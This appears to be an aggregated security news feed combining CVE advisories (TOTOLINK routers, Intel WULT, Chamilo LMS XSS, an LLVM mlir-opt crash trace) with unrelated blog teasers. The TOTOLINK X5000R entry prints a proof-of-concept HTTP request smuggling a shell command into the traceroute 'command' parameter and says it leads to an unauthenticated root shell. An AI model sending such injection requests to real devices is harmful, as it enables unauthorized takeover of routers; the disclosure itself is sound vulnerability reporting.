Categories: Business
There are a lot of benefits to ChatGPT, but many in the security community have concerns about it. Malwarebytes' CEO Marcin Kleczynski takes a deep dive into the topic.



(Read more...)




The post ChatGPT: Cybersecurity friend or foe? appeared first on Malwarebytes Labs.

ChatGPT: Cybersecurity friend or foe?

TOTOLINK A3300R v17.0.0cu.557 is vulnerable to Command Injection.

**Basic information**

    - ## CVE-ID: ## CVE-2023-31729
    - ## Vendor: ## Totolink
    - ## Product: ## A3300R - V17.0.0cu.557_B20221024
    - ## Firmware version: ## the latest V17.0.0cu.557_B20221024 firmware version
    - ## Type: ## command injection
    

**Vulnerability description**

FIRMWA DOWNLOAD: HTTPS://WWW.TOTOLINK.CN/DATA/UPLOAD/20230228/EEA9795866EA68EE471C1B6573A370E1.RAR

Totolink a3300r v17.0.0cu.557 router has a command injection vulnerability in the request /cgi-bin/cstecgi.cgi by funcsion setddnscfg. Totolink a3300r v17.0.0cu.557 router has a command injection vulnerability in the request /cgi-bin/cstecgi.cgi by funcsion setiptvcfg. Totolink a3300r v17.0.0cu.557 router has a command injection vulnerability in the request /cgi-bin/cstecgi.cgi by funcsion setipv6cfg. Totolink a3300r v17.0.0cu.557 router has a command injection vulnerability in the request /cgi-bin/cstecgi.cgi by funcsion setlancfg. Totolink a3300r v17.0.0cu.557 router has a command injection vulnerability in the request /cgi-bin/cstecgi.cgi by funcsion setremotecfg. Totolink a3300r v17.0.0cu.557 router has a command injection vulnerability in the request /cgi-bin/cstecgi.cgi by funcsion setschedulecfg. Totolink a3300r v17.0.0cu.557 router has a command injection vulnerability in the request /cgi-bin/cstecgi.cgi by funcsion settraceroutecfg. Totolink a3300r v17.0.0cu.557 router has a command injection vulnerability in the request /cgi-bin/cstecgi.cgi by funcsion seturlfilterrules. Totolink a3300r v17.0.0cu.557 router has a command injection vulnerability in the request /cgi-bin/cstecgi.cgi by funcsion setwancfg.

**Vulnerability Proof****run Poc**

  

**repair suggestion**

Filter characters such as **\` $ | & ;** for the hostname parameter in the setwancfg function.

CVE-2023-31729: CVE/CVE-2023-31729.md at main · D2y6p/CVE

Uncontrolled search path in the WULT software maintained by Intel(R) before version 1.0.0 (commit id 592300b) may allow an unauthenticated user to potentially enable escalation of privilege via network access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**WULT Software Advisory**

**Summary: **

A potential security vulnerability in the Wake Up Latency Tracer (WULT) software maintained by Intel® may allow escalation of privilege. Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2023-27298

Description: Uncontrolled search path in the WULT software maintained by Intel(R) before version 1.0.0 (commit id 592300b) may allow an unauthenticated user to potentially enable escalation of privilege via network access.

CVSS Base Score: 8.8 High

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**Affected Products:**

WULT software maintained by Intel® before version 1.0.0 (commit id 592300b).

**Recommendations:**

Intel recommends updating the WULT software maintained by Intel® to version 1.0.0 (commit id 592300b) or later.

Updates are available for download at this location:

https://github.com/intel/wult/commits

**Acknowledgements:**

Intel would like to thank Sanidhya Ved for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

05/09/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

© Intel Corporation.  Intel, the Intel logo, and other Intel marks are trademarks of Intel Corporation or its subsidiaries United States and other countries.  Other names and brands may be claimed as the property of others.

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2023-27298: INTEL-SA-00853

We talk to the Signal Foundation’s Meredith Whittaker about how the surveillance economy is newer than we all might realize—and what we can do to fight back.

How to Reclaim Your Online Privacy

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the course category parameters.

CVE-2023-31804: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the skype and linedin_url parameters.

CVE-2023-31802: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the skills wheel parameter.

CVE-2023-31801: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the forum title parameter.

CVE-2023-31800: Security issues - Chamilo LMS

llvm-project commit fdbc55a5 was discovered to contain a segmentation fault via the component mlir::IROperand<mlir::OpOperand.

Reproduced at commit fdbc55a5

mlir-opt --canonicalize temp.mlir

temp.mlir.txt

PLEASE submit a bug report to https://github.com/llvm/llvm-project/issues/ and include the crash backtrace.
Stack dump:
0.	Program arguments: mlir-opt --canonicalize temp.mlir
Stack dump without symbol names (ensure you have llvm-symbolizer in your PATH or set the environment var \`LLVM\_SYMBOLIZER\_PATH\` to point to it):
0  mlir-opt                 0x000000010528a10c llvm::sys::PrintStackTrace(llvm::raw\_ostream&, int) + 72
1  mlir-opt                 0x000000010528a628 PrintStackTraceSignalHandler(void\*) + 28
2  mlir-opt                 0x0000000105288738 llvm::sys::RunSignalHandlers() + 148
3  mlir-opt                 0x000000010528bef8 SignalHandler(int) + 252
4  libsystem\_platform.dylib 0x00000001a33254c4 \_sigtramp + 56
5  mlir-opt                 0x0000000105320820 mlir::IROperand<mlir::OpOperand, mlir::Value>::insertIntoCurrent() + 52
6  mlir-opt                 0x0000000105320674 mlir::IROperand<mlir::OpOperand, mlir::Value>::set(mlir::Value) + 48
7  mlir-opt                 0x000000010532056c void mlir::IRObjectWithUseList<mlir::OpOperand>::replaceAllUsesWith<mlir::Value&>(mlir::Value&) + 228
8  mlir-opt                 0x00000001052ef310 mlir::Value::replaceAllUsesWith(mlir::Value) const + 40
9  mlir-opt                 0x0000000106b8f834 std::\_\_1::enable\_if<!std::is\_convertible<mlir::ValueRange&, mlir::Operation\*>::value, void>::type mlir::ResultRange::replaceAllUsesWith<mlir::ValueRange&>(mlir::ValueRange&) + 332
10 mlir-opt                 0x0000000106b8f36c void mlir::Operation::replaceAllUsesWith<mlir::ValueRange&>(mlir::ValueRange&) + 64
11 mlir-opt                 0x0000000109157758 mlir::RewriterBase::replaceOp(mlir::Operation\*, mlir::ValueRange) + 200
12 mlir-opt                 0x0000000105cb2ee8 (anonymous namespace)::DeduplicateAndRemoveDeadOperandsAndResults::matchAndRewrite(mlir::linalg::GenericOp, mlir::PatternRewriter&) const + 1240
13 mlir-opt                 0x0000000105f5a700 mlir::detail::OpOrInterfaceRewritePatternBase<mlir::linalg::GenericOp>::matchAndRewrite(mlir::Operation\*, mlir::PatternRewriter&) const + 72
14 mlir-opt                 0x0000000109b158e8 mlir::PatternApplicator::matchAndRewrite(mlir::Operation\*, mlir::PatternRewriter&, llvm::function\_ref<bool (mlir::Pattern const&)>, llvm::function\_ref<void (mlir::Pattern const&)>, llvm::function\_ref<mlir::LogicalResult (mlir::Pattern const&)>) + 1432
15 mlir-opt                 0x0000000108e67820 (anonymous namespace)::GreedyPatternRewriteDriver::simplify(llvm::MutableArrayRef<mlir::Region>) + 1640
16 mlir-opt                 0x0000000108e67068 mlir::applyPatternsAndFoldGreedily(llvm::MutableArrayRef<mlir::Region>, mlir::FrozenRewritePatternSet const&, mlir::GreedyRewriteConfig) + 240
17 mlir-opt                 0x0000000105915fb4 mlir::applyPatternsAndFoldGreedily(mlir::Operation\*, mlir::FrozenRewritePatternSet const&, mlir::GreedyRewriteConfig) + 76
18 mlir-opt                 0x0000000108d581d0 (anonymous namespace)::Canonicalizer::runOnOperation() + 132
19 mlir-opt                 0x0000000108ce0838 mlir::detail::OpToOpPassAdaptor::run(mlir::Pass\*, mlir::Operation\*, mlir::AnalysisManager, bool, unsigned int) + 512
20 mlir-opt                 0x0000000108ce0f08 mlir::detail::OpToOpPassAdaptor::runPipeline(mlir::OpPassManager&, mlir::Operation\*, mlir::AnalysisManager, bool, unsigned int, mlir::PassInstrumentor\*, mlir::PassInstrumentation::PipelineParentInfo const\*) + 364
21 mlir-opt                 0x0000000108ce30cc mlir::PassManager::runPasses(mlir::Operation\*, mlir::AnalysisManager) + 108
22 mlir-opt                 0x0000000108ce2ea0 mlir::PassManager::run(mlir::Operation\*) + 732
23 mlir-opt                 0x0000000108cc7b80 performActions(llvm::raw\_ostream&, bool, bool, llvm::SourceMgr&, mlir::MLIRContext\*, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, bool, bool) + 560
24 mlir-opt                 0x0000000108cc7714 processBuffer(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, bool, bool, bool, bool, bool, bool, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, mlir::DialectRegistry&, llvm::ThreadPool\*) + 496
25 mlir-opt                 0x0000000108cc74dc mlir::MlirOptMain(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, mlir::DialectRegistry&, bool, bool, bool, bool, bool, bool, bool)::$\_0::operator()(std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&) const + 204
26 mlir-opt                 0x0000000108cc73f0 mlir::LogicalResult llvm::function\_ref<mlir::LogicalResult (std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&)>::callback\_fn<mlir::MlirOptMain(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, mlir::DialectRegistry&, bool, bool, bool, bool, bool, bool, bool)::$\_0>(long, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&) + 80
27 mlir-opt                 0x0000000108ec4700 llvm::function\_ref<mlir::LogicalResult (std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&)>::operator()(std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&) const + 96
28 mlir-opt                 0x0000000108ec41e4 mlir::splitAndProcessBuffer(std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::function\_ref<mlir::LogicalResult (std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&)>, llvm::raw\_ostream&, bool, bool) + 128
29 mlir-opt                 0x0000000108cc4e48 mlir::MlirOptMain(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, mlir::DialectRegistry&, bool, bool, bool, bool, bool, bool, bool) + 320
30 mlir-opt                 0x0000000108cc5050 mlir::MlirOptMain(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, mlir::PassPipelineCLParser const&, mlir::DialectRegistry&, bool, bool, bool, bool, bool, bool, bool, bool) + 296
31 mlir-opt                 0x0000000108cc5bfc mlir::MlirOptMain(int, char\*\*, llvm::StringRef, mlir::DialectRegistry&, bool) + 2888
32 mlir-opt                 0x0000000104ac9df8 main + 148
33 dyld                     0x0000000121d1d088 start + 516

CVE-2023-29932: [mlir] canonicalize pass crashed with segmentation fault · Issue #58745 · llvm/llvm-project

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

TOTOLINK X5000R (V9.1.0u.6369\_B20230113)was found to contain a command insertion vulnerability in setting/setTracerouteCfg.This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.3.2
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 82
    Origin: http://192.168.3.2
    Connection: close
    Referer: http://192.168.3.2/advance/traceroute.html?time=1679125513355
    Cookie: SESSION_ID=2:1679122532:2
    
    {"command":"127.0.0.1; pwd > /tmp/1.txt;","num":"4","topicurl":"setTracerouteCfg"}
    

Finally, you can write exp to get a stable root shell without authorization.

Tag

#acer